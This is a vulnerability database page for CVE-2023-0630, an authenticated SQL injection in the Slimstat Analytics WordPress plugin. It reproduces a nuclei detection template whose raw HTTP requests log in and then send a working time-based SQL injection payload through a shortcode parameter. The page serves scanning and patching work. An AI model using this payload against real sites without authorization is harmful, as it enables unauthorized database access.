Lucene search
K

Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection in WordPress. Allows subscribers to execute SQL query via shortcode leading to unauthorized DB access

Related
Refs
Code
id: CVE-2023-0630

info:
  name: Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information.
  remediation: Fixed in version 4.9.3.3
  reference:
    - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55
    - https://wordpress.org/plugins/wp-slimstat
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0630
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/RandomRobbieBF/CVE-2023-0630
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-0630
    cwe-id: CWE-89
    epss-score: 0.05141
    epss-percentile: 0.91356
    cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp-slimstat
    product: slimstat_analytics
    framework: wordpress
  tags: time-based-sqli,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=parse-media-shortcode&shortcode=[slimstat f="count" w="author"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=7'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "audioShortcodeLibrary")'
        condition: and
# digest: 4a0a00473045022100d6668ef6cecb120ad3dca33af2dcbd217bb4bd71be9c06c8e8f3b4e1d82a11a6022058da40ecf881da079e98ea32433ade8d7f3ba57bdb1874b082a0143aad97de3c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
EPSS0.05141
SSVC
37